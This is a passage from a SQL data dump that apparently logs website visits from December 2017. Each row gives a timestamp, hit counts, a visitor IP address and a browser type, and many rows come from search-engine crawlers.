,(186513,1513132255,5,5,0,0,'46.229.168.79','other'),(186514,1513132311,7,7,0,0,'46.229.168.74','other'),(186515,1513132426,5,5,0,0,'46.229.168.76','other'),(186516,1513132498,4,4,0,0,'46.229.168.77','other'),(186517,1513132614,4,4,0,0,'46.229.168.71','other'),(186518,1513132700,3,3,0,0,'46.229.168.80','other'),(186519,1513132980,5,5,0,0,'46.229.168.78','other'),(186520,1513133011,5,5,0,0,'46.229.168.69','other'),(186521,1513133050,2,2,0,0,'46.229.168.65','other'),(186522,1513133066,5,5,0,0,'46.229.168.73','other'),(186523,1513133100,1,0,1,0,'66.249.66.156',''),(186524,1513133125,1,1,0,0,'46.229.168.68','other'),(186525,1513133143,1,1,0,0,'46.229.168.75','other'),(186526,1513133252,4,4,0,0,'46.229.168.67','other'),(186527,1513133340,5,5,0,0,'46.229.168.76','other'),(186528,1513133361,2,2,0,0,'46.229.168.72','other'),(186529,1513133381,3,3,0,0,'46.229.168.74','other'),(186530,1513133456,2,2,0,0,'46.229.168.79','other'),(186531,1513133496,5,5,0,0,'46.229.168.77','other'),(186532,1513133507,5,5,0,0,'46.229.168.70','other'),(186533,1513133623,3,3,0,0,'46.229.168.66','other'),(186534,1513133765,3,3,0,0,'46.229.168.80','other'),(186535,1513133807,3,3,0,0,'46.229.168.71','other'),(186536,1513133966,3,3,0,0,'46.229.168.69','other'),(186537,1513134027,1,1,0,0,'46.229.168.78','other'),(186538,1513134091,2,2,0,0,'46.229.168.73','other'),(186539,1513134112,1,1,0,0,'46.229.168.68','other'),(186540,1513134198,1,1,0,0,'46.161.9.39','chrome'),(186541,1513135378,1,1,0,0,'37.204.97.17','msie'),(186542,1513137714,1,0,1,0,'66.249.66.157',''),(186543,1513139875,1,1,0,0,'8.29.198.25','other'),(186544,1513139925,1,1,0,0,'91.196.178.136','firefox'),(186545,1513140365,1,0,1,0,'66.249.66.157',''),(186546,1513142955,1,1,0,0,'157.55.39.19','other'),(186547,1513145065,1,1,0,0,'216.244.66.237','other'),(186548,1513145214,4,4,0,0,'176.31.101.111','other'),(186549,1513146384,1,1,0,0,'91.196.178.67','chrome'),(186550,1513146444,1,1,0,0,'91.196.178.65','chrome'),(186551,1513146651,1,1,0,0,'91.196.178.71','chrome'),(186552,1513146823,1,1,0,0,'91.196.178.71','firefox'),(186553,1513147089,1,1,0,0,'91.213.33.174','firefox'),(186554,1513147569,1,0,1,0,'66.249.66.157',''),(186555,1513147660,2,2,0,0,'91.196.177.46','chrome'),(186556,1513148692,1,1,0,0,'207.46.13.6','other'),(186557,1513149032,1,1,0,0,'91.196.178.71','chrome'),(186558,1513149047,1,1,0,0,'178.54.190.249','chrome'),(186559,1513149289,1,1,0,0,'91.196.177.46','chrome'),(186560,1513149679,1,1,0,0,'13.56.229.65','chrome'),(186561,1513150001,1,1,0,0,'91.196.178.162','chrome'),(186562,1513150418,1,1,0,0,'157.55.39.49','other'),(186563,1513150576,2,2,0,0,'144.76.115.190','other'),(186564,1513150714,1,1,0,0,'8.29.198.27','other'),(186565,1513151250,2,2,0,0,'92.112.229.211','firefox'),(186566,1513151967,1,1,0,0,'91.196.178.70','chrome'),(186567,1513152135,2,2,0,0,'91.196.178.101','chrome'),(186568,1513152342,1,1,0,0,'37.52.18.138','chrome'),(186569,1513153149,1,1,0,0,'37.55.143.252','chrome'),(186570,1513154753,1,1,0,0,'82.207.121.233','chrome'),(186571,1513154865,1,1,0,0,'91.196.178.101','chrome'),(186572,1513155297,1,1,0,0,'37.52.80.249','chrome'),(186573,1513155371,1,1,0,0,'95.134.20.22','chrome'),(186574,1513156225,1,1,0,0,'91.196.177.15','chrome'),(186575,1513156602,1,1,0,0,'107.178.36.16','chrome'),(186576,1513156642,1,0,1,0,'66.249.66.156',''),(186577,1513157270,1,1,0,0,'157.55.39.165','other'),(186578,1513158033,1,1,0,0,'157.55.39.49','other'),(186579,1513159051,1,1,0,0,'91.196.178.161','chrome'),(186580,1513159487,1,0,1,0,'66.249.66.155',''),(186581,1513159556,1,1,0,0,'94.178.236.160','opera'),(186582,1513159950,1,1,0,0,'130.180.216.206','chrome'),(186583,1513161562,1,1,0,0,'8.29.198.27','other'),(186584,1513161885,1,0,1,0,'66.249.66.75',''),(186585,1513162106,1,1,0,0,'199.249.223.44','chrome'),(186586,1513162109,1,1,0,0,'94.178.236.160','chrome'),(186587,1513162598,1,1,0,0,'91.196.178.162','chrome'),(186588,1513163009,1,1,0,0,'217.69.133.225','other'),(186589,1513163402,4,4,0,0,'193.70.39.204','other'),(186590,1513163625,1,1,0,0,'207.46.13.6','other'),(186591,1513163919,1,1,0,0,'37.53.136.175','chrome'),(186592,1513163982,1,1,0,0,'194.187.104.147','chrome'),(186593,1513166101,1,1,0,0,'46.219.219.106','other'),(186594,1513166306,1,1,0,0,'91.196.178.161','chrome'),(186595,1513166683,1,1,0,0,'157.55.39.49','other'),(186596,1513167904,1,1,0,0,'91.229.101.48','chrome'),(186597,1513169202,1,1,0,0,'91.196.178.71','chrome'),(186598,1513169724,1,1,0,0,'46.211.113.158','chrome'),(186599,1513170110,1,1,0,0,'46.164.139.38','chrome'),(186600,1513170189,1,0,1,0,'66.249.66.156',''),(186601,1513172214,1,1,0,0,'91.196.178.71','chrome'),(186602,1513172216,1,1,0,0,'62.80.185.138','chrome'),(186603,1513172402,1,1,0,0,'8.29.198.25','other'),(186604,1513172706,1,1,0,0,'94.253.127.186','chrome'),(186605,1513172962,1,1,0,0,'92.112.229.211','firefox'),(186606,1513173117,1,1,0,0,'91.196.178.71','chrome'),(186607,1513173173,1,1,0,0,'162.210.196.129','other'),(186608,1513173438,1,1,0,0,'95.134.116.24','chrome'),(186609,1513173686,1,1,0,0,'91.196.178.68','firefox'),(186610,1513174027,1,1,0,0,'207.46.13.6','other'),(186611,1513175409,1,1,0,0,'91.196.179.25','chrome'),(186612,1513176811,2,2,0,0,'91.196.178.71','chrome'),(186613,1513177113,1,1,0,0,'217.69.133.250','other'),(186614,1513177525,1,1,0,0,'91.196.178.71','firefox'),(186615,1513178270,1,1,0,0,'157.55.39.165','other'),(186616,1513179438,3,3,0,0,'91.196.177.46','chrome'),(186617,1513180079,1,1,0,0,'157.55.39.19','other'),(186618,1513180180,2,2,0,0,'163.172.143.186','chrome'),(186619,1513180289,1,0,1,0,'66.249.66.155',''),(186620,1513180571,1,1,0,0,'46.211.103.216','other'),(186621,1513180960,1,1,0,0,'66.249.66.156','chrome'),(186622,1513181283,1,1,0,0,'91.196.179.33','chrome'),(186623,1513183030,2,2,0,0,'92.113.175.232','chrome'),(186624,1513183238,1,1,0,0,'8.29.198.26','other'),(186625,1513183255,1,1,0,0,'91.196.177.46','chrome'),(186626,1513183271,1,1,0,0,'178.154.171.88','other'),(186627,1513183451,1,1,0,0,'85.203.18.254','chrome'),(186628,1513184246,1,0,1,0,'66.249.66.155',''),(186629,1513184405,1,1,0,0,'91.196.177.46','chrome'),(186630,1513184922,1,1,0,0,'95.133.208.94','chrome'),(186631,1513188402,1,1,0,0,'204.79.180.15','msie'),(186632,1513189136,1,0,1,0,'66.249.66.157',''),(186633,1513189692,1,1,0,0,'91.196.178.68','chrome'),(186634,1513190044,1,1,0,0,'40.77.167.10','other'),(186635,1513190522,1,1,0,0,'95.134.185.138','other'),(186636,1513190886,1,0,1,0,'66.249.66.74',''),(186637,1513191259,1,1,0,0,'91.247.227.140','firefox'),(186638,1513192867,1,1,0,0,'109.194.87.169','chrome'),(186639,1513193882,1,1,0,0,'91.196.178.163','chrome'),(186640,1513193895,1,0,1,0,'185.71.3.159',''),(186641,1513194010,1,1,0,0,'40.77.167.0','other'),(186642,1513194070,1,1,0,0,'8.29.198.26','other'),(186643,1513194178,1,1,0,0,'107.167.113.19','other'),(186644,1513194502,1,0,1,0,'66.249.66.155',''),(186645,1513194910,1,1,0,0,'66.249.66.156','chrome'),(186646,1513195823,1,1,0,0,'40.77.167.0','other'),(186647,1513197041,1,0,1,0,'66.249.66.157',''),(186648,1513198194,1,1,0,0,'176.15.182.57','msie'),(186649,1513198652,1,1,0,0,'91.196.178.168','chrome'),(186650,1513200689,1,1,0,0,'217.69.133.68','other'),(186651,1513200936,1,1,0,0,'109.63.148.124','chrome'),(186652,1513200938,1,1,0,0,'128.68.23.9','chrome'),(186653,1513201179,1,1,0,0,'92.113.175.78','chrome'),(186654,1513202241,1,0,1,0,'66.249.66.75',''),(186655,1513204014,1,1,0,0,'217.69.133.244','other'),(186656,1513204075,1,1,0,0,'217.69.133.203','other'),(186657,1513204093,1,1,0,0,'217.69.133.9','other'),(186658,1513204420,1,1,0,0,'157.55.39.19','other'),(186659,1513204912,1,1,0,0,'8.29.198.27','other'),(186660,1513206070,1,0,1,0,'66.249.66.157',''),(186661,1513208024,1,1,0,0,'157.55.39.170','other'),(186662,1513214390,1,0,1,0,'66.249.70.29',''),(186663,1513215751,1,1,0,0,'8.29.198.25','other'),(186664,1513215827,1,1,0,0,'94.158.35.53','chrome'),(186665,1513216274,1,1,0,0,'95.132.133.10','chrome'),(186666,1513217025,1,1,0,0,'40.77.167.94','other'),(186667,1513221335,1,0,1,0,'66.249.70.29',''),(186668,1513221560,1,0,1,0,'66.249.70.25',''),(186669,1513221949,5,5,0,0,'88.198.23.179','other'),(186670,1513222807,1,0,1,0,'66.249.64.30',''),(186671,1513226579,1,1,0,0,'8.29.198.26','other'),(186672,1513227676,1,1,0,0,'66.249.64.29','chrome'),(186673,1513227696,2,1,1,0,'66.249.64.28',''),(186674,1513228824,1,1,0,0,'66.249.64.28','chrome'),(186675,1513230046,1,1,0,0,'176.37.106.51','other'),(186676,1513230996,43,43,0,0,'173.208.157.186','other'),(186677,1513232350,1,0,1,0,'66.249.70.27',''),(186678,1513232982,1,0,1,0,'66.249.64.30',''),(186679,1513233392,1,1,0,0,'178.54.190.249','chrome'),(186680,1513234262,1,0,1,0,'66.249.70.29',''),(186681,1513234784,1,0,1,0,'66.249.64.29',''),(186682,1513234820,1,1,0,0,'91.196.177.46','chrome'),(186683,1513234835,1,0,1,0,'66.249.70.27',''),(186684,1513235849,1,1,0,0,'91.196.178.65','chrome'),(186685,1513236778,1,1,0,0,'91.196.177.46','chrome'),(186686,1513237143,1,1,0,0,'185.138.228.178','opera'),(186687,1513237419,1,1,0,0,'8.29.198.25','other'),(186688,1513237432,1,1,0,0,'91.196.178.65','firefox'),(186689,1513238440,1,1,0,0,'91.196.178.70','firefox'),(186690,1513238476,1,1,0,0,'157.55.39.16','other'),(186691,1513239252,1,1,0,0,'95.132.222.242','chrome'),(186692,1513239512,2,0,2,0,'66.249.64.28',''),(186693,1513239639,1,1,0,0,'157.55.39.16','other'),(186694,1513239704,1,1,0,0,'91.196.178.70','chrome'),(186695,1513240152,1,1,0,0,'91.196.178.65','firefox'),(186696,1513240895,2,2,0,0,'46.201.240.112','chrome'),(186697,1513241813,1,1,0,0,'157.55.39.16','other'),(186698,1513241949,1,1,0,0,'66.249.64.29','chrome'),(186699,1513242527,1,0,1,0,'66.249.64.28',''),(186700,1513242584,1,1,0,0,'83.170.203.202','firefox'),(186701,1513243271,1,1,0,0,'37.55.145.197','chrome'),(186702,1513243525,1,1,0,0,'91.230.198.34','chrome'),(186703,1513244396,1,1,0,0,'46.229.168.75','other'),(186704,1513244422,8,8,0,0,'46.229.168.79','other'),(186705,1513244431,3,3,0,0,'46.229.168.66','other'),(186706,1513244469,6,6,0,0,'46.229.168.77','other'),(186707,1513244482,9,9,0,0,'46.229.168.78','other'),(186708,1513244494,8,8,0,0,'46.229.168.70','other'),(186709,1513244512,4,4,0,0,'46.229.168.71','other'),(186710,1513244544,6,6,0,0,'46.229.168.68','other'),(186711,1513244582,10,10,0,0,'46.229.168.80','other'),(186712,1513244587,6,6,0,0,'46.229.168.65','other'),(186713,1513244621,3,3,0,0,'46.229.168.67','other'),(186714,1513244629,2,2,0,0,'46.229.168.76','other'),(186715,1513244945,8,8,0,0,'46.229.168.72','other'),(186716,1513244968,9,9,0,0,'46.229.168.69','other'),(186717,1513245156,2,2,0,0,'46.229.168.73','other'),(186718,1513245195,2,2,0,0,'91.196.178.101','chrome'),(186719,1513245410,11,11,0,0,'46.229.168.77','other'),(186720,1513245473,6,6,0,0,'46.229.168.74','other'),(186721,1513245496,6,6,0,0,'46.229.168.80','other'),(186722,1513245517,3,3,0,0,'46.229.168.66','other'),(186723,1513245555,9,9,0,0,'46.229.168.79','other'),(186724,1513245597,7,7,0,0,'46.229.168.68','other'),(186725,1513245670,3,3,0,0,'46.229.168.65','other'),(186726,1513245708,6,6,0,0,'46.229.168.76','other'),(186727,1513245744,5,5,0,0,'46.229.168.67','other'),(186728,1513245907,3,3,0,0,'46.229.168.69','other'),(186729,1513245921,7,7,0,0,'46.229.168.72','other'),(186730,1513246087,2,2,0,0,'46.229.168.73','other'),(186731,1513246159,2,2,0,0,'46.229.168.78','other'),(186732,1513246255,1,1,0,0,'91.196.178.168','chrome'),(186733,1513246261,3,3,0,0,'46.229.168.71','other'),(186734,1513246315,4,4,0,0,'46.229.168.77','other'),(186735,1513246373,2,2,0,0,'46.229.168.75','other'),(186736,1513246553,1,0,1,0,'66.249.70.25',''),(186737,1513246571,8,8,0,0,'46.229.168.70','other'),(186738,1513246587,8,8,0,0,'46.229.168.80','other'),(186739,1513246627,10,10,0,0,'46.229.168.76','other'),(186740,1513246641,1,0,1,0,'66.249.70.29',''),(186741,1513246645,1,0,1,0,'66.249.70.27',''),(186742,1513246659,4,4,0,0,'46.229.168.67','other'),(186743,1513246769,2,2,0,0,'46.229.168.68','other'),(186744,1513246839,6,6,0,0,'46.229.168.69','other'),(186745,1513246882,1,1,0,0,'91.196.177.46','chrome'),(186746,1513247026,4,4,0,0,'46.229.168.65','other'),(186747,1513247063,1,1,0,0,'46.229.168.78','other'),(186748,1513247133,8,8,0,0,'46.229.168.72','other'),(186749,1513247247,6,6,0,0,'46.229.168.77','other'),(186750,1513247320,4,4,0,0,'46.229.168.74','other'),(186751,1513247439,6,6,0,0,'46.229.168.79','other'),(186752,1513247471,7,7,0,0,'46.229.168.73','other'),(186753,1513247555,7,7,0,0,'46.229.168.71','other'),(186754,1513247606,7,7,0,0,'46.229.168.66','other'),(186755,1513247775,6,6,0,0,'46.229.168.69','other'),(186756,1513247828,4,4,0,0,'46.229.168.70','other'),(186757,1513247838,1,1,0,0,'82.196.1.179','chrome'),(186758,1513247946,4,4,0,0,'46.229.168.76','other'),(186759,1513247997,5,5,0,0,'46.229.168.80','other'),(186760,1513248085,6,6,0,0,'46.229.168.65','other'),(186761,1513248249,5,5,0,0,'46.229.168.68','other'),(186762,1513248255,1,1,0,0,'8.29.198.26','other'),(186763,1513248272,3,3,0,0,'46.229.168.67','other'),(186764,1513248291,2,2,0,0,'46.229.168.74','other'),(186765,1513248374,3,3,0,0,'46.229.168.72','other'),(186766,1513248454,5,5,0,0,'46.229.168.73','other'),(186767,1513248532,1,1,0,0,'91.196.178.71','chrome'),(186768,1513248574,3,3,0,0,'46.229.168.79','other'),(186769,1513248603,5,5,0,0,'46.229.168.66','other'),(186770,1513248611,6,6,0,0,'46.229.168.71','other'),(186771,1513248703,1,1,0,0,'46.229.168.77','other'),(186772,1513248766,5,5,0,0,'46.229.168.78','other'),(186773,1513248782,1,1,0,0,'141.8.142.74','other'),(186774,1513248851,6,6,0,0,'46.229.168.69','other'),(186775,1513248864,6,6,0,0,'46.229.168.70','other'),(186776,1513249061,4,4,0,0,'46.229.168.76','other'),(186777,1513249106,1,1,0,0,'91.196.178.101','chrome'),(186778,1513249118,6,6,0,0,'46.229.168.65','other'),(186779,1513249285,9,9,0,0,'46.229.168.68','other'),(186780,1513249374,4,4,0,0,'46.229.168.73','other'),(186781,1513249412,4,4,0,0,'46.229.168.80','other'),(186782,1513249439,1,1,0,0,'178.154.171.88','other'),(186783,1513249490,7,7,0,0,'46.229.168.72','other'),(186784,1513249617,10,10,0,0,'46.229.168.77','other'),(186785,1513249618,2,2,0,0,'91.124.239.129','chrome'),(186786,1513249634,6,6,0,0,'46.229.168.71','other'),(186787,1513249669,10,10,0,0,'46.229.168.79','other'),(186788,1513249753,7,7,0,0,'46.229.168.69','other'),(186789,1513249795,6,6,0,0,'46.229.168.70','other'),(186790,1513249881,5,5,0,0,'46.229.168.66','other'),(186791,1513250013,1,0,1,0,'66.249.70.25',''),(186792,1513250095,3,3,0,0,'46.229.168.76','other'),(186793,1513250112,11,11,0,0,'46.229.168.65','other'),(186794,1513250238,9,9,0,0,'46.229.168.68','other'),(186795,1513250314,1,1,0,0,'66.249.70.27','chrome'),(186796,1513250355,3,3,0,0,'46.229.168.78','other'),(186797,1513250397,9,9,0,0,'46.229.168.72','other'),(186798,1513250580,6,6,0,0,'46.229.168.80','other'),(186799,1513250698,4,4,0,0,'46.229.168.70','other'),(186800,1513250726,5,5,0,0,'46.229.168.67','other'),(186801,1513250759,6,6,0,0,'46.229.168.73','other'),(186802,1513250842,4,4,0,0,'46.229.168.69','other'),(186803,1513251042,10,10,0,0,'46.229.168.66','other'),(186804,1513251056,4,4,0,0,'46.229.168.77','other'),(186805,1513251118,6,6,0,0,'46.229.168.76','other'),(186806,1513251120,5,5,0,0,'46.229.168.65','other'),(186807,1513251131,1,0,1,0,'66.249.64.17',''),(186808,1513251174,1,1,0,0,'139.59.152.186','other'),(186809,1513251187,4,4,0,0,'46.229.168.74','other'),(186810,1513251291,8,8,0,0,'46.229.168.68','other'),(186811,1513251302,1,0,1,0,'66.249.64.15',''),(186812,1513251311,5,5,0,0,'46.229.168.79','other'),(186813,1513251325,4,4,0,0,'46.229.168.72','other'),(186814,1513251326,1,1,0,0,'178.140.90.230','other'),(186815,1513251486,3,3,0,0,'46.229.168.80','other'),(186816,1513251577,5,5,0,0,'46.229.168.78','other'),(186817,1513251679,5,5,0,0,'46.229.168.67','other'),(186818,1513251805,2,2,0,0,'46.229.168.69','other'),(186819,1513251946,1,1,0,0,'46.229.168.66','other'),(186820,1513251958,2,2,0,0,'46.229.168.71','other'),(186821,1513252081,1,1,0,0,'46.229.168.65','other'),(186822,1513252146,1,0,1,0,'66.249.64.17',''),(186823,1513252721,1,1,0,0,'91.196.178.165','chrome'),(186824,1513252790,1,1,0,0,'212.86.229.13','firefox'),(186825,1513253005,1,1,0,0,'87.250.224.46','other'),(186826,1513253146,1,1,0,0,'78.111.187.86','chrome'),(186827,1513253191,1,1,0,0,'78.111.189.31','firefox'),(186828,1513253408,1,1,0,0,'37.73.219.221','chrome'),(186829,1513253598,22,22,0,0,'142.4.200.37','other'),(186830,1513254054,1,1,0,0,'54.208.102.37','other'),(186831,1513254385,1,1,0,0,'37.73.219.221','chrome'),(186832,1513254583,1,1,0,0,'95.134.99.46','chrome'),(186833,1513254587,1,0,1,0,'66.249.64.17',''),(186834,1513254636,1,1,0,0,'141.8.142.74','other'),(186835,1513255131,1,1,0,0,'91.196.178.71','chrome'),(186836,1513255241,1,0,1,0,'66.249.70.29',''),(186837,1513256326,1,1,0,0,'130.180.218.209','chrome'),(186838,1513256336,2,2,0,0,'91.196.177.46','firefox'),(186839,1513256663,1,1,0,0,'141.8.142.74','other'),(186840,1513256703,2,2,0,0,'91.196.178.71','chrome'),(186841,1513257339,1,1,0,0,'91.196.178.70','chrome'),(186842,1513257989,1,1,0,0,'37.73.219.221','chrome'),(186843,1513258196,1,1,0,0,'89.38.96.66','chrome'),(186844,1513258655,1,0,1,0,'66.249.64.29',''),(186845,1513259107,1,1,0,0,'8.29.198.25','other'),(186846,1513259399,1,1,0,0,'91.196.178.165','chrome'),(186847,1513259427,1,1,0,0,'31.41.94.194','chrome'),(186848,1513260014,1,0,1,0,'66.249.70.27',''),(186849,1513260269,1,1,0,0,'91.196.178.71','chrome'),(186850,1513260448,1,1,0,0,'217.69.133.244','other'),(186851,1513260859,1,0,1,0,'66.249.64.30',''),(186852,1513261210,2,2,0,0,'178.154.171.88','other'),(186853,1513261275,1,0,1,0,'66.249.64.28',''),(186854,1513261644,1,1,0,0,'46.211.97.128','other'),(186855,1513261755,1,1,0,0,'95.134.168.158','chrome'),(186856,1513262078,1,1,0,0,'109.63.160.120','chrome'),(186857,1513262400,1,1,0,0,'91.196.178.71','firefox'),(186858,1513262964,3,3,0,0,'144.76.38.40','other'),(186859,1513263525,1,1,0,0,'87.250.224.46','other'),(186860,1513263908,1,1,0,0,'91.196.178.70','chrome'),(186861,1513263969,1,1,0,0,'62.80.185.138','chrome'),(186862,1513264040,1,1,0,0,'91.196.178.66','chrome'),(186863,1513264311,2,2,0,0,'37.73.219.221','chrome'),(186864,1513264614,1,1,0,0,'91.196.178.66','firefox'),(186865,1513264921,1,1,0,0,'91.196.178.129','chrome'),(186866,1513265236,1,1,0,0,'37.73.219.221','chrome'),(186867,1513265764,1,0,1,0,'66.249.70.25',''),(186868,1513265953,1,1,0,0,'91.196.177.46','firefox'),(186869,1513266125,1,1,0,0,'188.166.48.218','chrome'),(186870,1513266725,1,1,0,0,'37.73.218.129','chrome'),(186871,1513266981,1,1,0,0,'145.255.1.45','chrome'),(186872,1513267309,1,1,0,0,'40.77.167.192','other'),(186873,1513267685,1,0,1,0,'66.249.70.29',''),(186874,1513267868,2,2,0,0,'157.55.39.16','other'),(186875,1513268776,1,1,0,0,'37.52.19.86','chrome'),(186876,1513268809,1,0,1,0,'66.249.70.27',''),(186877,1513269297,1,1,0,0,'92.113.175.232','chrome'),(186878,1513269484,2,2,0,0,'91.196.178.100','other'),(186879,1513269497,1,1,0,0,'31.13.110.117','other'),(186880,1513269944,1,1,0,0,'8.29.198.27','other'),(186881,1513270391,1,1,0,0,'207.46.13.86','other'),(186882,1513270984,1,1,0,0,'79.165.100.251','msie'),(186883,1513270985,1,1,0,0,'128.72.107.149','msie'),(186884,1513270986,1,1,0,0,'188.187.10.66','msie'),(186885,1513270991,1,1,0,0,'46.242.116.243','msie'),(186886,1513271003,1,1,0,0,'95.84.250.79','msie'),(186887,1513271004,1,1,0,0,'46.188.32.159','msie'),(186888,1513271237,1,1,0,0,'178.92.250.194','chrome'),(186889,1513271708,1,1,0,0,'216.244.66.237','other'),(186890,1513271931,2,2,0,0,'95.215.216.182','other'),(186891,1513272012,2,2,0,0,'81.213.189.102','other'),(186892,1513272046,1,0,1,0,'66.249.64.28',''),(186893,1513272983,2,0,2,0,'66.249.64.28',''),(186894,1513273208,1,1,0,0,'92.113.175.232','chrome'),(186895,1513274155,1,1,0,0,'91.196.178.132','chrome'),(186896,1513274746,1,1,0,0,'66.249.64.30','chrome'),(186897,1513275712,1,0,1,0,'66.249.64.28',''),(186898,1513275749,1,0,1,0,'66.249.64.29',''),(186899,1513276305,1,0,1,0,'66.249.64.30',''),(186900,1513276380,1,1,0,0,'217.69.133.69','other'),(186901,1513276725,1,0,1,0,'66.249.70.25',''),(186902,1513277291,1,1,0,0,'217.69.133.2','other'),(186903,1513277293,3,3,0,0,'217.69.133.6','other'),(186904,1513277303,1,1,0,0,'217.69.134.200','other'),(186905,1513277310,1,1,0,0,'217.69.134.178','other'),(186906,1513277320,1,1,0,0,'217.69.133.4','other'),(186907,1513277330,1,1,0,0,'217.69.134.176','other'),(186908,1513277346,2,2,0,0,'217.69.134.185','other'),(186909,1513277414,1,1,0,0,'217.69.134.160','other'),(186910,1513277429,1,1,0,0,'217.69.133.3','other'),(186911,1513277437,1,1,0,0,'217.69.134.182','other'),(186912,1513277694,1,1,0,0,'195.10.210.49','firefox'),(186913,1513278785,1,1,0,0,'185.11.28.32','chrome'),(186914,1513280373,1,1,0,0,'78.111.185.58','chrome'),(186915,1513280408,1,1,0,0,'199.58.86.209','other'),(186916,1513280785,1,1,0,0,'8.29.198.25','other'),(186917,1513281904,1,1,0,0,'157.55.39.192','other'),(186918,1513282470,1,1,0,0,'88.135.214.246','chrome'),(186919,1513282781,1,1,0,0,'91.196.178.162','chrome'),(186920,1513282962,1,1,0,0,'157.55.39.192','other'),(186921,1513283930,1,0,1,0,'66.249.70.25',''),(186922,1513284046,1,0,1,0,'66.249.64.30',''),(186923,1513284144,1,1,0,0,'216.244.66.237','other'),(186924,1513287971,1,0,1,0,'68.180.229.52',''),(186925,1513288326,1,1,0,0,'66.249.64.28','chrome'),(186926,1513288827,1,0,1,0,'66.249.64.30',''),(186927,1513289597,1,1,0,0,'66.249.70.25','chrome'),(186928,1513291622,1,1,0,0,'8.29.198.26','other'),(186929,1513291646,1,1,0,0,'87.250.224.46','other'),(186930,1513291647,1,1,0,0,'178.154.171.88','other'),(186931,1513293472,1,1,0,0,'217.69.133.69','other'),(186932,1513295141,1,1,0,0,'40.77.167.194','other'),(186933,1513295320,1,0,1,0,'66.249.70.27',''),(186934,1513295437,1,0,1,0,'66.249.64.29',''),(186935,1513296548,1,0,1,0,'66.249.64.30',''),(186936,1513296771,13,13,0,0,'173.212.254.158','other'),(186937,1513298711,1,0,1,0,'66.249.64.28',''),(186938,1513299482,1,1,0,0,'157.55.39.16','other'),(186939,1513299789,2,2,0,0,'144.76.115.190','other'),(186940,1513302183,1,1,0,0,'217.69.133.230','other'),(186941,1513302302,1,0,1,0,'66.249.70.25',''),(186942,1513302455,1,1,0,0,'8.29.198.27','other'),(186943,1513302943,4,0,4,0,'66.249.64.29',''),(186944,1513302957,1,0,1,0,'66.249.64.28',''),(186945,1513303723,1,1,0,0,'217.69.133.237','other'),(186946,1513304895,1,0,1,0,'66.249.64.28',''),(186947,1513305245,1,1,0,0,'35.184.189.105','other'),(186948,1513307271,1,0,1,0,'66.249.64.28',''),(186949,1513307284,1,0,1,0,'66.249.64.30',''),(186950,1513307980,1,1,0,0,'66.102.9.29','chrome'),(186951,1513308176,2,2,0,0,'35.184.189.105','other'),(186952,1513308833,1,0,1,0,'66.249.64.28',''),(186953,1513308900,1,0,1,0,'66.249.70.29',''),(186954,1513309702,1,1,0,0,'66.249.64.29','chrome'),(186955,1513309708,1,1,0,0,'66.249.64.28','chrome'),(186956,1513311876,1,1,0,0,'66.249.64.30','chrome'),(186957,1513313286,1,1,0,0,'8.29.198.26','other'),(186958,1513313446,1,0,1,0,'66.249.64.29',''),(186959,1513315093,1,1,0,0,'157.55.39.234','other'),(186960,1513315302,1,1,0,0,'35.184.189.105','other'),(186961,1513316060,1,1,0,0,'66.249.64.29','chrome'),(186962,1513316103,1,1,0,0,'66.249.64.28','chrome'),(186963,1513317141,1,1,0,0,'91.196.178.97','chrome'),(186964,1513318864,1,0,1,0,'66.249.70.27',''),(186965,1513319356,1,1,0,0,'13.56.229.65','chrome'),(186966,1513319732,1,1,0,0,'178.54.190.249','chrome'),(186967,1513319832,1,1,0,0,'37.52.18.138','chrome'),(186968,1513319859,1,0,1,0,'66.249.64.30',''),(186969,1513319907,2,2,0,0,'91.196.178.70','chrome'),(186970,1513320203,1,1,0,0,'95.132.44.99','chrome'),(186971,1513320464,1,1,0,0,'91.196.179.33','firefox'),(186972,1513320683,1,1,0,0,'66.249.64.28','chrome'),(186973,1513321728,1,1,0,0,'35.184.189.105','other'),(186974,1513321784,1,1,0,0,'91.196.178.71','chrome'),(186975,1513322249,1,1,0,0,'64.40.148.32','chrome'),(186976,1513322833,1,0,1,0,'66.249.64.30',''),(186977,1513323125,1,1,0,0,'66.249.70.25','chrome'),(186978,1513323488,1,1,0,0,'66.249.64.29','chrome'),(186979,1513323560,1,1,0,0,'91.196.177.15','chrome'),(186980,1513323711,1,1,0,0,'91.196.178.163','chrome'),(186981,1513323787,1,1,0,0,'66.102.9.40','chrome'),(186982,1513323788,1,1,0,0,'66.102.9.35','chrome'),(186983,1513324034,1,1,0,0,'91.196.178.70','chrome'),(186984,1513324125,1,1,0,0,'8.29.198.25','other'),(186985,1513324436,1,0,1,0,'66.249.64.30',''),(186986,1513325137,1,1,0,0,'157.55.39.234','other'),(186987,1513325181,1,1,0,0,'46.201.122.19','chrome'),(186988,1513325304,1,1,0,0,'193.202.118.162','firefox'),(186989,1513325356,1,1,0,0,'141.8.142.74','other'),(186990,1513325630,1,1,0,0,'188.166.37.150','chrome'),(186991,1513325747,2,2,0,0,'91.196.178.70','chrome'),(186992,1513325825,1,1,0,0,'35.184.189.105','other'),(186993,1513325895,1,0,1,0,'66.249.70.27',''),(186994,1513326020,1,1,0,0,'66.249.64.29','chrome'),(186995,1513326487,1,1,0,0,'141.8.142.74','other'),(186996,1513326659,1,1,0,0,'91.196.177.15','chrome'),(186997,1513328067,1,1,0,0,'91.196.178.70','chrome'),(186998,1513329328,1,1,0,0,'157.55.39.234','other'),(186999,1513329431,1,1,0,0,'66.249.70.25','chrome'),(187000,1513330083,1,1,0,0,'217.69.136.204','other'),(187001,1513330546,1,1,0,0,'185.126.252.137','chrome'),(187002,1513331182,1,1,0,0,'213.108.44.26','chrome'),(187003,1513331484,65,65,0,0,'173.212.240.226','other'),(187004,1513331689,1,1,0,0,'91.196.178.70','chrome'),(187005,1513331785,1,1,0,0,'91.196.178.162','chrome'),(187006,1513331926,1,0,1,0,'66.249.70.25',''),(187007,1513332278,4,4,0,0,'141.8.142.74','other'),(187008,1513332380,4,4,0,0,'178.154.171.88','other'),(187009,1513332418,2,2,0,0,'87.250.224.46','other'),(187010,1513332545,4,4,0,0,'69.30.226.234','other'),(187011,1513332579,1,1,0,0,'37.9.113.182','other'),(187012,1513332674,1,0,1,0,'66.249.70.27',''),(187013,1513333082,1,1,0,0,'107.21.1.8','other'),(187014,1513333083,1,1,0,0,'54.208.102.37','other'),(187015,1513333188,1,1,0,0,'213.108.44.26','chrome'),(187016,1513333470,10,10,0,0,'141.8.142.74','other'),(187017,1513333561,1,1,0,0,'176.120.40.74','chrome'),(187018,1513333831,3,3,0,0,'178.154.171.88','other'),(187019,1513333970,1,1,0,0,'217.66.102.61','other'),(187020,1513334232,6,6,0,0,'